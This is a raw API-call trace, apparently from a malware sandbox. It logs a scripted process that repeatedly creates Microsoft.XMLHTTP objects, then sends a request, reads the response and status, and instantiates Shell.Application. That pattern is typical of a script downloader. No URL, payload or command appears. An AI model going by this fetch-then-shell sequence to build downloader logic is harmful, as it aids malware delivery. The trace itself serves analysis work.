	[0759.816] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0759.817] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0759.817] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0759.817] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0759.817] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74b8) returned 0x0
	[0759.817] ??2@YAPEAX_K@Z () returned 0x62f330
	[0759.817] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74b8, pUnkSite=0x62f330) 
	[0759.817] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0759.817] XMLHTTPRequest:IUnknown:Release (This=0x49c74b8) returned 0x0
	[0759.817] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0759.817] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0759.817] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0759.818] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0759.818] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0759.818] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0759.818] SysStringLen (param_1=0x0) returned 0x0
	[0759.818] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0759.818] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0759.818] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7550) returned 0x0
	[0759.818] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0759.818] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c88) returned 0x0
	[0759.818] ??2@YAPEAX_K@Z () returned 0x62f310
	[0759.818] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c88, pUnkSite=0x62f310) 
	[0759.818] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0759.819] XMLHTTPRequest:IUnknown:Release (This=0x49c5c88) returned 0x0
	[0759.819] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7550) returned 0x0
	[0759.819] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7550) returned 0x3
	[0759.819] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0759.819] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7550, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0759.819] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0759.819] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0759.819] SysStringLen (param_1=0x0) returned 0x0
	[0759.819] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0759.819] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0759.819] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0759.820] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0759.820] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74b8) returned 0x0
	[0759.820] ??2@YAPEAX_K@Z () returned 0x62f330
	[0759.820] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74b8, pUnkSite=0x62f330) 
	[0759.820] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0759.820] XMLHTTPRequest:IUnknown:Release (This=0x49c74b8) returned 0x0
	[0759.820] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0759.820] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0759.820] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0759.820] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0759.820] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0759.821] longjmp () 
	[0759.821] longjmp () 
	[0759.821] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0759.821] SysStringLen (param_1=0x0) returned 0x0
	[0759.821] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0759.821] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0759.821] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0759.821] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0759.821] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7878) returned 0x0
	[0759.821] ??2@YAPEAX_K@Z () returned 0x62f310
	[0759.821] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7878, pUnkSite=0x62f310) 
	[0759.821] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0759.821] XMLHTTPRequest:IUnknown:Release (This=0x49c7878) returned 0x0
	[0759.821] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0759.822] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0759.822] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0759.822] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0759.822] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0759.822] longjmp () 
	[0759.822] longjmp () 
	[0759.822] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0759.822] SysStringLen (param_1=0x0) returned 0x0
	[0759.822] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0759.823] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0759.823] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74b0) returned 0x0
	[0759.823] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0759.823] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7518) returned 0x0
	[0759.823] ??2@YAPEAX_K@Z () returned 0x62f330
	[0759.823] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7518, pUnkSite=0x62f330) 
	[0759.823] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0759.823] XMLHTTPRequest:IUnknown:Release (This=0x49c7518) returned 0x0
	[0759.823] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74b0) returned 0x0
	[0759.823] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74b0) returned 0x3
	[0759.823] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0759.823] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0759.824] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0759.824] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0759.824] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0759.824] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0760.046] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0760.046] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0760.046] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0760.046] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0760.046] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0760.047] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0760.047] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0760.047] SysStringLen (param_1=0x0) returned 0x0
	[0760.047] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0760.047] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0760.047] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x3967c0) returned 0x0
	[0760.047] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0760.047] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396800) returned 0x0
	[0760.047] ??2@YAPEAX_K@Z () returned 0x62f350
	[0760.047] Shell:IObjectWithSite:SetSite (This=0x396800, pUnkSite=0x62f350) returned 0x0
	[0760.047] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0760.047] Shell:IUnknown:Release (This=0x396800) returned 0x1
